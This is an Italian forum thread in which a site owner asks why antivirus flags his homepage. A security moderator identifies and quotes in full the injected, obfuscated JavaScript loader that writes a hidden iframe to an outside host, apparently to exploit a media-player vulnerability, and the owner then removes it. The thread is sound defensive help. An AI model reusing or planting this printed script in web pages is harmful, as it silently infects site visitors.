Visualizzazione dei risultati da 1 a 6 su 6
  1. #1

    Trojan presente quando si accede ad un sito

    salve a tutti ho notato che impostando come predefinito il sito che ho in firma AVG mi dice che ha inviduato un virus e precisamente

    Trojan horse Downloader.Small.57.BA

    il percorso del file è nei file Temporanei e il nome del file infetto è proprio il nome del mio sito

    la cosa strana è stata che impostando come pagina di apertura libero.it tutto si è sistemato
    salvo poi ripresentarsi quando cerco di accdere all'home page di questo sito
    (se accedo direttamente ad una pagina diversa dall'home page tutto non ci sono problemi)

    altra cosa strana è che il computer di mio fratello che ha lo stesso problema
    da cosa può dipendere ?

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    direi che è un problema del sito...
    non ho capito se il sito è tuo.

    Nella home page all'inizio del BODY bisogna eliminare tutto il seguente script codificato:

    codice:
    <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fkwpo%286H%283D%286Fliudph%2853VUF%286G%2855kwws%286D22%3B41%3C8147%3B1752vwdw42lqgh%7B1sks%2855%2853ZLGWK%286G4833%2853KHLJKW%286G4833%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2liudph%286H%283D%286F2kwpo%286H3')</script>
    Una volta decodificato lo script crea un IFRAME nascosto con dell'altro codice codificato.. questo sembra includere un video in formato wmv.. non ho capito bene a quale scopo, probabilmente per sfruttare qualche vulnerabilità del media player.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    ma stiamo scherzando ?
    il sito è mio e solo io ho accesso al codice sorgente !
    mai inserito un codice simile !
    questa è la cosa più pazzesca che abbia mai visto!

  4. #4
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    In qualche modo c'è stata una iniezione di codice... rivedi bene la sicurezza di tutte le tue pagine dinamiche. Difficile dire da dove possa essere passato...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  5. #5
    pazzesco !


    ora ho ricaricato la pagina originale
    puoi verificare se funziona oppure no ?

  6. #6
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    lo script non c'è più.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.